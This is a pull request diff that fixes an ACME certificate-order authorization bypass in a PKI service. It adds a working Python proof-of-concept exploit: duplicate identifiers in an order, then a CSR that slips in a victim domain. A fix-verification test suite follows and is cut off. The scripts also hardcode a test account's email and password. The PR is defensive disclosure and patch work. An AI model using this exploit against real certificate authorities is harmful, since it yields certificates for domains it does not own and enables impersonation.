### PR TITLE
fix(pki): prevent ACME order finalization bypass via duplicate identifiers

### DIFF
--- a/backend/src/ee/services/pki-acme/pki-acme-service.ts
+++ b/backend/src/ee/services/pki-acme/pki-acme-service.ts
@@ -773,6 +773,11 @@ export const pkiAcmeServiceFactory = ({
       }
     }
 
+    const uniqueIdentifiers = new Set(payload.identifiers.map((id) => `${id.type}:${id.value.toLowerCase()}`));
+    if (uniqueIdentifiers.size !== payload.identifiers.length) {
+      throw new AcmeMalformedError({ message: "Duplicate identifiers are not permitted" });
+    }
+
     const order = await acmeOrderDAL.transaction(async (tx) => {
       const account = (await acmeAccountDAL.findByProjectIdAndAccountId(profileId, accountId))!;
       const createdOrder = await acmeOrderDAL.create(
@@ -1146,12 +1151,15 @@ export const pkiAcmeServiceFactory = ({
             : AcmeIdentifierType.DNS;
           csrIdentifierPairs.add(`${cnType}:${certificateRequest.commonName.toLowerCase()}`);
         }
-        if (
-          csrIdentifierPairs.size !== orderWithAuthorizations.authorizations.length ||
-          !orderWithAuthorizations.authorizations.every((auth) => {
+        const authIdentifierPairs = new Set(
+          orderWithAuthorizations.authorizations.map((auth) => {
             const value = auth.wildcard ? `*.${auth.identifierValue}` : auth.identifierValue;
-            return csrIdentifierPairs.has(`${auth.identifierType}:${value.toLowerCase()}`);
+            return `${auth.identifierType}:${value.toLowerCase()}`;
           })
+        );
+        if (
+          csrIdentifierPairs.size !== authIdentifierPairs.size ||
+          ![...csrIdentifierPairs].every((id) => authIdentifierPairs.has(id))
         ) {
           throw new AcmeBadCSRError({ message: "Invalid CSR: Common name + SANs mismatch with order identifiers" });
         }

--- a/exploit-test/exploit.py
+++ b/exploit-test/exploit.py
@@ -1,0 +1,446 @@
+#!/usr/bin/env python3
+"""
+PoC: Authorization Bypass in ACME Order Finalization via Duplicate Identifiers
+
+Attack: Create order for [attacker.com, attacker.com], finalize with CSR for [attacker.com, victim.com].
+"""
+
+import base64
+import hashlib
+import hmac
+import json
+import sys
+import time
+import traceback
+
+import requests
+import urllib3
+from cryptography import x509
+from cryptography.hazmat.primitives import hashes, serialization
+from cryptography.hazmat.primitives.asymmetric import ec, utils
+from cryptography.x509.oid import NameOID
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+# ── Config ──────────────────────────────────────────────────────────────────────
+BASE_URL = "https://saif-sec-8-veria-17-authorization-bypass-in-acme-order-finaliza.test"
+API = f"{BASE_URL}/api"
+EMAIL = "saif@infisical.com"
+PASSWORD = "InfisicalW234*"
+
+ATTACKER_DOMAIN = "attacker.com"
+VICTIM_DOMAIN = "victim.com"
+
+session = requests.Session()
+session.verify = False
+
+
+def b64url(data: bytes) -> str:
+    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()
+
+def b64url_decode(s: str) -> bytes:
+    s += "=" * (4 - len(s) % 4)
+    return base64.urlsafe_b64decode(s)
+
+def step(msg):
+    print(f"\n{'='*60}\n  {msg}\n{'='*60}")
+
+def info(msg):
+    print(f"  [+] {msg}")
+
+def fail(msg):
+    print(f"  [!] FAIL: {msg}")
+    sys.exit(1)
+
+def warn(msg):
+    print(f"  [!] {msg}")
+
+
+# ── JWS helpers ─────────────────────────────────────────────────────────────────
+
+def make_jwk_public(private_key) -> dict:
+    pub = private_key.public_key()
+    nums = pub.public_numbers()
+    coord_len = (pub.key_size + 7) // 8
+    return {
+        "kty": "EC",
+        "crv": "P-256",
+        "x": b64url(nums.x.to_bytes(coord_len, "big")),
+        "y": b64url(nums.y.to_bytes(coord_len, "big")),
+    }
+
+def sign_es256(private_key, message: bytes) -> bytes:
+    der_sig = private_key.sign(message, ec.ECDSA(hashes.SHA256()))
+    r, s = utils.decode_dss_signature(der_sig)
+    return r.to_bytes(32, "big") + s.to_bytes(32, "big")
+
+def make_jws(url, payload, nonce, private_key, *, jwk=None, kid=None):
+    header = {"alg": "ES256", "nonce": nonce, "url": url}
+    if jwk:
+        header["jwk"] = jwk
+    elif kid:
+        header["kid"] = kid
+    else:
+        raise ValueError("Need jwk or kid")
+
+    protected_b64 = b64url(json.dumps(header).encode())
+    if payload is None:
+        payload_b64 = ""
+    else:
+        payload_b64 = b64url(json.dumps(payload).encode())
+
+    signing_input = f"{protected_b64}.{payload_b64}".encode()
+    sig = sign_es256(private_key, signing_input)
+    return {"protected": protected_b64, "payload": payload_b64, "signature": b64url(sig)}
+
+def make_eab_jws(account_jwk, eab_kid, eab_secret, new_account_url):
+    header = {"alg": "HS256", "kid": eab_kid, "url": new_account_url}
+    protected_b64 = b64url(json.dumps(header).encode())
+    payload_b64 = b64url(json.dumps(account_jwk).encode())
+    signing_input = f"{protected_b64}.{payload_b64}".encode()
+    secret_bytes = b64url_decode(eab_secret)
+    sig = hmac.new(secret_bytes, signing_input, hashlib.sha256).digest()
+    return {"protected": protected_b64, "payload": payload_b64, "signature": b64url(sig)}
+
+
+# ── API calls ───────────────────────────────────────────────────────────────────
+
+def login():
+    step("Step 1: Login")
+    r = session.post(f"{API}/v3/auth/login", json={"email": EMAIL, "password": PASSWORD})
+    if r.status_code != 200:
+        fail(f"Login failed: {r.status_code} {r.text}")
+    token = r.json()["accessToken"]
+    info(f"Token: {token[:30]}...")
+    session.headers["Authorization"] = f"Bearer {token}"
+    return token
+
+def get_org_and_select():
+    step("Step 2: Get organization and select it")
+    r = session.get(f"{API}/v1/organization")
+    if r.status_code != 200:
+        fail(f"Get orgs failed: {r.status_code} {r.text}")
+    orgs = r.json().get("organizations", [])
+    if not orgs:
+        fail("No organizations found")
+    org_id = orgs[0]["id"]
+    info(f"Org: {orgs[0].get('name', 'N/A')} ({org_id})")
+
+    # Select org to get org-scoped JWT
+    r = session.post(f"{API}/v3/auth/select-organization", json={"organizationId": org_id})
+    if r.status_code != 200:
+        fail(f"Select org failed: {r.status_code} {r.text}")
+    token = r.json().get("token")
+    if not token:
+        fail(f"No token from select-org: {r.json()}")
+    session.headers["Authorization"] = f"Bearer {token}"
+    info(f"Org-scoped token: {token[:30]}...")
+    return org_id
+
+def create_project(org_id):
+    step("Step 3: Create cert-manager project")
+    slug = f"acme-exploit-{int(time.time())}"
+    r = session.post(f"{API}/v1/projects", json={
+        "projectName": "ACME Exploit Test",
+        "slug": slug,
+        "type": "cert-manager",
+    })
+    if r.status_code not in (200, 201):
+        fail(f"Create project failed: {r.status_code} {r.text}")
+    project = r.json().get("project", r.json())
+    info(f"Project: {project['slug']} ({project['id']})")
+    return project["id"], project["slug"]
+
+def create_cert_policy(project_id):
+    step("Step 4: Create certificate policy")
+    r = session.post(f"{API}/v1/cert-manager/certificate-policies", json={
+        "name": "exploit-test-policy",
+        "projectId": project_id,
+        "subject": [
+            {"type": "common_name", "allowed": ["*"]},
+        ],
+        "sans": [
+            {"type": "dns_name", "allowed": ["*"]},
+            {"type": "ip_address", "allowed": ["*"]},
+        ],
+        "algorithms": {
+            "signature": ["ECDSA-SHA256"],
+            "keyAlgorithm": ["EC_prime256v1"],
+        },
+    })
+    if r.status_code not in (200, 201):
+        fail(f"Create policy failed: {r.status_code} {r.text}")
+    policy = r.json().get("certificatePolicy", r.json())
+    info(f"Policy: {policy['id']}")
+    return policy["id"]
+
+def create_root_ca(project_id):
+    step("Step 5: Create internal root CA")
+    r = session.post(f"{API}/v1/cert-manager/ca/internal", json={
+        "name": "exploit-test-ca",
+        "projectId": project_id,
+        "status": "active",
+        "configuration": {
+            "type": "root",
+            "commonName": "Exploit Test Root CA",
+            "organization": "Test",
+            "ou": "Test",
+            "country": "US",
+            "province": "CA",
+            "locality": "SF",
+            "keyAlgorithm": "EC_prime256v1",
+            "maxPathLength": -1,
+        }
+    })
+    if r.status_code not in (200, 201):
+        fail(f"Create CA failed: {r.status_code} {r.text}")
+    ca = r.json()
+    ca_id = ca["id"]
+    info(f"CA: {ca_id}")
+    return ca_id
+
+def generate_ca_certificate(ca_id):
+    step("Step 5b: Generate root CA certificate")
+    r = session.post(f"{API}/v1/cert-manager/ca/internal/{ca_id}/certificate", json={
+        "notBefore": "2024-01-01T00:00:00Z",
+        "notAfter": "2030-01-01T00:00:00Z",
+        "maxPathLength": -1,
+    })
+    if r.status_code not in (200, 201):
+        fail(f"Generate CA cert failed: {r.status_code} {r.text}")
+    data = r.json()
+    info(f"CA cert serial: {data.get('serialNumber', 'N/A')}")
+    return data
+
+def create_acme_profile(ca_id, policy_id, project_id):
+    step("Step 6: Create ACME certificate profile (skipDnsOwnershipVerification=true)")
+    slug = f"acme-exploit-{int(time.time())}"
+    r = session.post(f"{API}/v1/cert-manager/certificate-profiles", json={
+        "caId": ca_id,
+        "certificatePolicyId": policy_id,
+        "slug": slug,
+        "description": "ACME exploit test",
+        "enrollmentType": "acme",
+        "issuerType": "ca",
+        "projectId": project_id,
+        "acmeConfig": {
+            "skipDnsOwnershipVerification": True,
+            "skipEabBinding": False,
+        },
+    })
+    if r.status_code not in (200, 201):
+        fail(f"Create profile failed: {r.status_code} {r.text}")
+    profile = r.json().get("certificateProfile", r.json())
+    profile_id = profile["id"]
+    info(f"Profile: {profile_id} (slug={slug})")
+    info(f"ACME config: {json.dumps(profile.get('acmeConfig', {}), indent=2)}")
+    return profile_id
+
+def get_eab_secret(profile_id):
+    step("Step 7: Get EAB credentials")
+    r = session.get(f"{API}/v1/cert-manager/certificate-profiles/{profile_id}/acme/eab-secret/reveal")
+    if r.status_code != 200:
+        fail(f"Get EAB failed: {r.status_code} {r.text}")
+    data = r.json()
+    info(f"EAB kid: {data['eabKid']}")
+    info(f"EAB secret: {data['eabSecret'][:20]}...")
+    return data["eabKid"], data["eabSecret"]
+
+
+# ── ACME protocol ──────────────────────────────────────────────────────────────
+
+ACME_BASE = f"{API}/v1/cert-manager/acme"
+
+def acme_directory(profile_id):
+    step("Step 8: ACME Directory")
+    r = session.get(f"{ACME_BASE}/profiles/{profile_id}/directory")
+    if r.status_code != 200:
+        fail(f"Directory failed: {r.status_code} {r.text}")
+    d = r.json()
+    info(f"Directory: {json.dumps(d, indent=2)}")
+    return d
+
+def acme_nonce(profile_id):
+    r = session.head(f"{ACME_BASE}/profiles/{profile_id}/new-nonce")
+    nonce = r.headers.get("Replay-Nonce")
+    if not nonce:
+        r = session.get(f"{ACME_BASE}/profiles/{profile_id}/new-nonce")
+        nonce = r.headers.get("Replay-Nonce")
+    if not nonce:
+        fail(f"No nonce: {dict(r.headers)}")
+    return nonce
+
+def acme_new_account(profile_id, private_key, jwk, eab_kid, eab_secret):
+    step("Step 9: ACME New Account (with EAB)")
+    nonce = acme_nonce(profile_id)
+    url = f"{ACME_BASE}/profiles/{profile_id}/new-account"
+    eab = make_eab_jws(jwk, eab_kid, eab_secret, url)
+    payload = {
+        "termsOfServiceAgreed": True,
+        "contact": [f"mailto:{EMAIL}"],
+        "externalAccountBinding": eab,
+    }
+    jws = make_jws(url, payload, nonce, private_key, jwk=jwk)
+    r = session.post(url, json=jws, headers={"Content-Type": "application/jose+json"})
+    if r.status_code not in (200, 201):
+        fail(f"New account failed: {r.status_code} {r.text}")
+    account_url = r.headers.get("Location", "")
+    info(f"Account: {account_url}")
+    return account_url
+
+def acme_new_order(profile_id, private_key, kid, identifiers):
+    step("Step 10: ACME New Order (DUPLICATE identifiers!)")
+    nonce = acme_nonce(profile_id)
+    url = f"{ACME_BASE}/profiles/{profile_id}/new-order"
+    info(f"Identifiers: {json.dumps(identifiers)}")
+    jws = make_jws(url, {"identifiers": identifiers}, nonce, private_key, kid=kid)
+    r = session.post(url, json=jws, headers={"Content-Type": "application/jose+json"})
+    if r.status_code not in (200, 201):
+        fail(f"New order failed: {r.status_code} {r.text}")
+    order_url = r.headers.get("Location", "")
+    order = r.json()
+    info(f"Order URL: {order_url}")
+    info(f"Status: {order.get('status')}")
+    info(f"Identifiers returned: {json.dumps(order.get('identifiers', []))}")
+    info(f"Authorizations: {order.get('authorizations', [])}")
+    order_id = order_url.rstrip("/").split("/")[-1]
+    return order_id, order
+
+def generate_sneaky_csr(attacker_domain, victim_domain):
+    key = ec.generate_private_key(ec.SECP256R1())
+    csr = (
+        x509.CertificateSigningRequestBuilder()
+        .subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, attacker_domain)]))
+        .add_extension(
+            x509.SubjectAlternativeName([
+                x509.DNSName(attacker_domain),
+                x509.DNSName(victim_domain),
+            ]),
+            critical=False,
+        )
+        .sign(key, hashes.SHA256())
+    )
+    return csr.public_bytes(serialization.Encoding.DER)
+
+def acme_finalize(profile_id, private_key, kid, order_id, csr_der):
+    step("Step 11: Finalize with SNEAKY CSR (contains victim.com)")
+    nonce = acme_nonce(profile_id)
+    url = f"{ACME_BASE}/profiles/{profile_id}/orders/{order_id}/finalize"
+    info(f"CSR SANs: [{ATTACKER_DOMAIN}, {VICTIM_DOMAIN}]")
+    jws = make_jws(url, {"csr": b64url(csr_der)}, nonce, private_key, kid=kid)
+    r = session.post(url, json=jws, headers={"Content-Type": "application/jose+json"})
+    info(f"Response: {r.status_code}")
+    info(f"Body: {json.dumps(r.json(), indent=2)}")
+    if r.status_code >= 400:
+        warn(f"Finalize REJECTED ({r.status_code})")
+        return None, r.json()
+    return r.json().get("status"), r.json()
+
+def acme_poll_order(profile_id, private_key, kid, order_id):
+    nonce = acme_nonce(profile_id)
+    url = f"{ACME_BASE}/profiles/{profile_id}/orders/{order_id}"
+    jws = make_jws(url, None, nonce, private_key, kid=kid)
+    r = session.post(url, json=jws, headers={"Content-Type": "application/jose+json"})
+    return r.json()
+
+def acme_download_cert(profile_id, private_key, kid, order_id):
+    step("Step 12: Download certificate")
+    nonce = acme_nonce(profile_id)
+    url = f"{ACME_BASE}/profiles/{profile_id}/orders/{order_id}/certificate"
+    jws = make_jws(url, None, nonce, private_key, kid=kid)
+    r = session.post(url, json=jws, headers={"Content-Type": "application/jose+json"})
+    if r.status_code != 200:
+        fail(f"Download cert failed: {r.status_code} {r.text}")
+    return r.text
+
+def check_cert(pem_chain):
+    step("Step 13: Check certificate SANs")
+    cert = x509.load_pem_x509_certificate(pem_chain.encode())
+    cn = cert.subject.get_attributes_for_oid(NameOID.COMMON_NAME)[0].value
+    info(f"CN: {cn}")
+    try:
+        san_ext = cert.extensions.get_extension_for_class(x509.SubjectAlternativeName)
+        sans = san_ext.value.get_values_for_type(x509.DNSName)
+        info(f"SANs: {sans}")
+        if VICTIM_DOMAIN in sans:
+            print(f"\n{'!'*60}")
+            print(f"  VULNERABILITY CONFIRMED!")
+            print(f"  Got a cert for '{VICTIM_DOMAIN}' without proving ownership!")
+            print(f"{'!'*60}\n")
+            return True
+        else:
+            info(f"'{VICTIM_DOMAIN}' not in SANs — exploit did not work")
+            return False
+    except x509.ExtensionNotFound:
+        info("No SAN extension")
+        return False
+
+
+# ── Main ────────────────────────────────────────────────────────────────────────
+
+def main():
+    print("=" * 60)
+    print("  ACME Authorization Bypass PoC")
+    print("  Duplicate Identifier Attack")
+    print("=" * 60)
+
+    # Setup infrastructure
+    login()
+    org_id = get_org_and_select()
+    project_id, project_slug = create_project(org_id)
+    policy_id = create_cert_policy(project_id)
+    ca_id = create_root_ca(project_id)
+    generate_ca_certificate(ca_id)
+    profile_id = create_acme_profile(ca_id, policy_id, project_id)
+    eab_kid, eab_secret = get_eab_secret(profile_id)
+
+    # ACME account
+    acme_key = ec.generate_private_key(ec.SECP256R1())
+    jwk = make_jwk_public(acme_key)
+    acme_directory(profile_id)
+    account_url = acme_new_account(profile_id, acme_key, jwk, eab_kid, eab_secret)
+
+    # The attack: order with DUPLICATE identifiers
+    identifiers = [
+        {"type": "dns", "value": ATTACKER_DOMAIN},
+        {"type": "dns", "value": ATTACKER_DOMAIN},  # DUPLICATE
+    ]
+    order_id, order_data = acme_new_order(profile_id, acme_key, account_url, identifiers)
+
+    if order_data.get("status") != "ready":
+        fail(f"Expected 'ready', got '{order_data.get('status')}'")
+
+    # Finalize with CSR that sneaks in victim.com
+    csr_der = generate_sneaky_csr(ATTACKER_DOMAIN, VICTIM_DOMAIN)
+    status, body = acme_finalize(profile_id, acme_key, account_url, order_id, csr_der)
+
+    if status is None:
+        print("\nFinalize was rejected — vulnerability may be patched or not exploitable.")
+        return
+
+    # Wait for cert issuance
+    if status == "processing":
+        info("Order processing, polling...")
+        for i in range(30):
+            time.sleep(2)
+            updated = acme_poll_order(profile_id, acme_key, account_url, order_id)
+            status = updated.get("status")
+            info(f"  Poll {i+1}: {status}")
+            if status in ("valid", "invalid"):
+                break
+
+    if status == "valid":
+        pem = acme_download_cert(profile_id, acme_key, account_url, order_id)
+        info(f"Certificate chain (first 400 chars):\n{pem[:400]}")
+        check_cert(pem)
+    else:
+        warn(f"Final order status: {status}")
+        warn(f"Body: {json.dumps(body, indent=2)}")
+
+
+if __name__ == "__main__":
+    try:
+        main()
+    except Exception as e:
+        print(f"\n[EXCEPTION] {e}")
+        traceback.print_exc()

--- a/exploit-test/verify_fix.py
+++ b/exploit-test/verify_fix.py
@@ -1,0 +1,321 @@
+#!/usr/bin/env python3
+"""
+Verify that the ACME authorization bypass fixes work:
+1. Duplicate identifiers are rejected at order creation
+2. CSR with extra unauthorized domain is rejected at finalization
+3. Legitimate orders (single + multi domain) are accepted at creation
+"""
+
+import base64
+import hashlib
+import hmac
+import json
+import sys
+import time
+import traceback
+
+import requests
+import urllib3
+from cryptography import x509
+from cryptography.hazmat.primitives import hashes, serialization
+from cryptography.hazmat.primitives.asymmetric import ec, utils
+from cryptography.x509.oid import NameOID
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+BASE_URL = "https://saif-sec-8-veria-17-authorization-bypass-in-acme-order-finaliza.test"
+API = f"{BASE_URL}/api"
+EMAIL = "saif@infisical.com"
+PASSWORD = "InfisicalW234*"
+ACME_BASE = f"{API}/v1/cert-manager/acme"
+
+session = requests.Session()
+session.verify = False
+
+def b64url(data: bytes) -> str:
+    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()
+
+def b64url_decode(s: str) -> bytes:
+    s += "=" * (4 - len(s) % 4)
+    return base64.urlsafe_b64decode(s)
+
+def step(msg):
+    print(f"\n{'='*60}\n  {msg}\n{'='*60}")
+
+def info(msg):
+    print(f"  [+] {msg}")
+
+def ok(msg):
+    print(f"  [OK] {msg}")
+
+def fail(msg):
+    print(f"  [FAIL] {msg}")
+
+def make_jwk_public(private_key):
+    pub = private_key.public_key()
+    nums = pub.public_numbers()
+    coord_len = (pub.key_size + 7) // 8
+    return {
+        "kty": "EC", "crv": "P-256",
+        "x": b64url(nums.x.to_bytes(coord_len, "big")),
+        "y": b64url(nums.y.to_bytes(coord_len, "big")),
+    }
+
+def sign_es256(private_key, message):
+    der_sig = private_key.sign(message, ec.ECDSA(hashes.SHA256()))
+    r, s = utils.decode_dss_signature(der_sig)
+    return r.to_bytes(32, "big") + s.to_bytes(32, "big")
+
+def make_jws(url, payload, nonce, private_key, *, jwk=None, kid=None):
+    header = {"alg": "ES256", "nonce": nonce, "url": url}
+    if jwk: header["jwk"] = jwk
+    elif kid: header["kid"] = kid
+    protected_b64 = b64url(json.dumps(header).encode())
+    payload_b64 = "" if payload is None else b64url(json.dumps(payload).encode())
+    sig = sign_es256(private_key, f"{protected_b64}.{payload_b64}".encode())
+    return {"protected": protected_b64, "payload": payload_b64, "signature": b64url(sig)}
+
+def make_eab_jws(account_jwk, eab_kid, eab_secret, url):
+    header = {"alg": "HS256", "kid": eab_kid, "url": url}
+    protected_b64 = b64url(json.dumps(header).encode())
+    payload_b64 = b64url(json.dumps(account_jwk).encode())
+    sig = hmac.new(b64url_decode(eab_secret), f"{protected_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
+    return {"protected": protected_b64, "payload": payload_b64, "signature": b64url(sig)}
+
+def acme_nonce(profile_id):
+    r = session.head(f"{ACME_BASE}/profiles/{profile_id}/new-nonce")
+    return r.headers.get("Replay-Nonce") or session.get(f"{ACME_BASE}/profiles/{profile_id}/new-nonce").headers.get("Replay-Nonce")
+
+
+def setup_infrastructure():
+    step("Setup: Login + infrastructure")
+    r = session.post(f"{API}/v3/auth/login", json={"email": EMAIL, "password": PASSWORD})
+    token = r.json()["accessToken"]
+    session.headers["Authorization"] = f"Bearer {token}"
+
+    r = session.get(f"{API}/v1/organization")
+    org_id = r.json()["organizations"][0]["id"]
+    r = session.post(f"{API}/v3/auth/select-organization", json={"organizationId": org_id})
+    session.headers["Authorization"] = f"Bearer {r.json()['token']}"
+
+    slug = f"verify-fix-{int(time.time())}"
+    r = session.post(f"{API}/v1/projects", json={"projectName": "Verify Fix", "slug": slug, "type": "cert-manager"})
+    project_id = r.json()["project"]["id"]
+
+    r = session.post(f"{API}/v1/cert-manager/certificate-policies", json={
+        "name": "verify-policy", "projectId": project_id,
+        "subject": [{"type": "common_name", "allowed": ["*"]}],
+        "sans": [{"type": "dns_name", "allowed": ["*"]}, {"type": "ip_address", "allowed": ["*"]}],
+    })
+    policy_id = r.json()["certificatePolicy"]["id"]
+
+    r = session.post(f"{API}/v1/cert-manager/ca/internal", json={
+        "name": "verify-ca", "projectId": project_id, "status": "active",
+        "configuration": {"type": "root", "commonName": "Verify CA", "organization": "Test",
+                         "ou": "Test", "country": "US", "province": "CA", "locality": "SF",
+                         "keyAlgorithm": "EC_prime256v1", "maxPathLength": -1}
+    })
+    ca_id = r.json()["id"]
+    session.post(f"{API}/v1/cert-manager/ca/internal/{ca_id}/certificate", json={
+        "notBefore": "2024-01-01T00:00:00Z", "notAfter": "2030-01-01T00:00:00Z", "maxPathLength": -1
+    })
+
+    r = session.post(f"{API}/v1/cert-manager/certificate-profiles", json={
+        "caId": ca_id, "certificatePolicyId": policy_id, "slug": slug, "enrollmentType": "acme",
+        "issuerType": "ca", "projectId": project_id,
+        "acmeConfig": {"skipDnsOwnershipVerification": True, "skipEabBinding": False}
+    })
+    profile_id = r.json()["certificateProfile"]["id"]
+
+    r = session.get(f"{API}/v1/cert-manager/certificate-profiles/{profile_id}/acme/eab-secret/reveal")
+    eab_kid, eab_secret = r.json()["eabKid"], r.json()["eabSecret"]
+
+    acme_key = ec.generate_private_key(ec.SECP256R1())
+    jwk = make_jwk_public(acme_key)
+    session.get(f"{ACME_BASE}/profiles/{profile_id}/directory")
+
+    nonce = acme_nonce(profile_id)
+    url = f"{ACME_BASE}/profiles/{profile_id}/new-account"
+    eab = make_eab_jws(jwk, eab_kid, eab_secret, url)
+    jws = make_jws(url, {"termsOfServiceAgreed": True, "contact": [f"mailto:{EMAIL}"], "externalAccountBinding": eab}, nonce, acme_key, jwk=jwk)
+    r = session.post(url, json=jws, headers={"Content-Type": "application/jose+json"})
+    account_url = r.headers["Location"]
+    info(f"Infrastructure ready (profile={profile_id})")
+    return profile_id, acme_key, account_url
+
+
+def test_duplicate_rejected(profile_id, acme_key, kid):
+    step("Test 1: Duplicate identifiers REJECTED at order creation")
+    nonce = acme_nonce(profile_id)
+    url = f"{ACME_BASE}/profiles/{profile_id}/new-order"
+    jws = make_jws(url, {"identifiers": [
+        {"type": "dns", "value": "dup.com"}, {"type": "dns", "value": "dup.com"}
+    ]}, nonce, acme_key, kid=kid)
+    r = session.post(url, json=jws, headers={"Content-Type": "application/jose+json"})
+    if r.status_code == 400 and "Duplicate" in r.text:
+        ok(f"Rejected: {r.json().get('detail', '')}")
+        return True
+    fail(f"Expected 400 with 'Duplicate' but got {r.status_code}: {r.text}")
+    return False
+
+
+def test_duplicate_case_insensitive(profile_id, acme_key, kid):
+    step("Test 2: Case-different duplicates also REJECTED")
+    nonce = acme_nonce(profile_id)
+    url = f"{ACME_BASE}/profiles/{profile_id}/new-order"
+    jws = make_jws(url, {"identifiers": [
+        {"type": "dns", "value": "Example.COM"}, {"type": "dns", "value": "example.com"}
+    ]}, nonce, acme_key, kid=kid)
+    r = session.post(url, json=jws, headers={"Content-Type": "application/jose+json"})
+    if r.status_code == 400 and "Duplicate" in r.text:
+        ok(f"Rejected: {r.json().get('detail', '')}")
+        return True
+    fail(f"Expected 400 with 'Duplicate' but got {r.status_code}: {r.text}")
+    return False
+
+
+def test_single_domain_order_accepted(profile_id, acme_key, kid):
+    step("Test 3: Single-domain order ACCEPTED")
+    nonce = acme_nonce(profile_id)
+    url = f"{ACME_BASE}/profiles/{profile_id}/new-order"
+    jws = make_jws(url, {"identifiers": [{"type": "dns", "value": "legit.com"}]}, nonce, acme_key, kid=kid)
+    r = session.post(url, json=jws, headers={"Content-Type": "application/jose+json"})
+    if r.status_code in (200, 201) and r.json().get("status") == "ready":
+        ok(f"Order created: {r.json()['identifiers']}")
+        return True
+    fail(f"Order creation failed: {r.status_code} {r.text}")
+    return False
+
+
+def test_multi_domain_order_accepted(profile_id, acme_key, kid):
+    step("Test 4: Multi-domain order (distinct domains) ACCEPTED")
+    nonce = acme_nonce(profile_id)
+    url = f"{ACME_BASE}/profiles/{profile_id}/new-order"
+    jws = make_jws(url, {"identifiers": [
+        {"type": "dns", "value": "a.com"}, {"type": "dns", "value": "b.com"}
+    ]}, nonce, acme_key, kid=kid)
+    r = session.post(url, json=jws, headers={"Content-Type": "application/jose+json"})
+    if r.status_code in (200, 201) and r.json().get("status") == "ready":
+        ok(f"Order created: {r.json()['identifiers']}")
+        return True
+    fail(f"Order creation failed: {r.status_code} {r.text}")
+    return False
+
+
+def test_wildcard_plus_base_accepted(profile_id, acme_key, kid):
+    step("Test 5: Wildcard + base domain (distinct) ACCEPTED")
+    nonce = acme_nonce(profile_id)
+    url = f"{ACME_BASE}/profiles/{profile_id}/new-order"
+    jws = make_jws(url, {"identifiers": [
+        {"type": "dns", "value": "*.example.com"}, {"type": "dns", "value": "example.com"}
+    ]}, nonce, acme_key, kid=kid)
+    r = session.post(url, json=jws, headers={"Content-Type": "application/jose+json"})
+    if r.status_code in (200, 201) and r.json().get("status") == "ready":
+        ok(f"Order created: {r.json()['identifiers']}")
+        return True
+    fail(f"Order creation failed: {r.status_code} {r.text}")
+    return False
+
+
+def test_csr_extra_domain_rejected(profile_id, acme_key, kid):
+    step("Test 6: CSR with extra unauthorized domain REJECTED at finalization")
+    nonce = acme_nonce(profile_id)
+    url = f"{ACME_BASE}/profiles/{profile_id}/new-order"
+    jws = make_jws(url, {"identifiers": [{"type": "dns", "value": "ordered.com"}]}, nonce, acme_key, kid=kid)
+    r = session.post(url, json=jws, headers={"Content-Type": "application/jose+json"})
+    if r.status_code not in (200, 201):
+        fail(f"Order creation failed: {r.status_code} {r.text}")
+        return False
+    order_id = r.headers["Location"].rstrip("/").split("/")[-1]
+    info(f"Order for [ordered.com] created")
+
+    key = ec.generate_private_key(ec.SECP256R1())
+    csr = (x509.CertificateSigningRequestBuilder()
+           .subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "ordered.com")]))
+           .add_extension(x509.SubjectAlternativeName([
+               x509.DNSName("ordered.com"), x509.DNSName("sneaky.com")
+           ]), critical=False)
+           .sign(key, hashes.SHA256()))
+
+    nonce = acme_nonce(profile_id)
+    fin_url = f"{ACME_BASE}/profiles/{profile_id}/orders/{order_id}/finalize"
+    jws = make_jws(fin_url, {"csr": b64url(csr.public_bytes(serialization.Encoding.DER))}, nonce, acme_key, kid=kid)
+    r = session.post(fin_url, json=jws, headers={"Content-Type": "application/jose+json"})
+    if r.status_code == 400 and "mismatch" in r.text.lower():
+        ok(f"Rejected: {r.json().get('detail', '')}")
+        return True
+    fail(f"Expected rejection but got {r.status_code}: {r.text}")
+    return False
+
+
+def test_csr_fewer_domains_rejected(profile_id, acme_key, kid):
+    step("Test 7: CSR with fewer domains than ordered REJECTED at finalization")
+    nonce = acme_nonce(profile_id)
+    url = f"{ACME_BASE}/profiles/{profile_id}/new-order"
+    jws = make_jws(url, {"identifiers": [
+        {"type": "dns", "value": "x.com"}, {"type": "dns", "value": "y.com"}
+    ]}, nonce, acme_key, kid=kid)
+    r = session.post(url, json=jws, headers={"Content-Type": "application/jose+json"})
+    if r.status_code not in (200, 201):
+        fail(f"Order creation failed: {r.status_code} {r.text}")
+        return False
+    order_id = r.headers["Location"].rstrip("/").split("/")[-1]
+    info(f"Order for [x.com, y.com] created")
+
+    # CSR only has x.com — missing y.com
+    key = ec.generate_private_key(ec.SECP256R1())
+    csr = (x509.CertificateSigningRequestBuilder()
+           .subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "x.com")]))
+           .add_extension(x509.SubjectAlternativeName([x509.DNSName("x.com")]), critical=False)
+           .sign(key, hashes.SHA256()))
+
+    nonce = acme_nonce(profile_id)
+    fin_url = f"{ACME_BASE}/profiles/{profile_id}/orders/{order_id}/finalize"
+    jws = make_jws(fin_url, {"csr": b64url(csr.public_bytes(serialization.Encoding.DER))}, nonce, acme_key, kid=kid)
+    r = session.post(fin_url, json=jws, headers={"Content-Type": "application/jose+json"})
+    if r.status_code == 400 and "mismatch" in r.text.lower():
+        ok(f"Rejected: {r.json().get('detail', '')}")
+        return True
+    fail(f"Expected rejection but got {r.status_code}: {r.text}")
+    return False
+
+
+def main():
+    print("=" * 60)
+    print("  ACME Authorization Bypass — Fix Verification")
+    print("=" * 60)
+
+    profile_id, acme_key, account_url = setup_infrastructure()
+
+    results = []
+    results.append(("Duplicate identifiers rejected", test_duplicate_rejected(profile_id, acme_key, account_url)))
+    results.append(("Case-insensitive duplicates rejected", test_duplicate_case_insensitive(profile_id, acme_key, account_url)))
+    results.append(("Single-domain order accepted", test_single_domain_order_accepted(profile_id, acme_key, account_url)))
+    results.append(("Multi-domain order accepted", test_multi_domain_order_accepted(profile_id, acme_key, account_url)))
+    results.append(("Wildcard + base domain accepted", test_wildcard_plus_base_accepted(profile_id, acme_key, account_url)))
+    results.append(("CSR extra domain rejected", test_csr_extra_domain_rejected(profile_id, acme_key, account_url)))
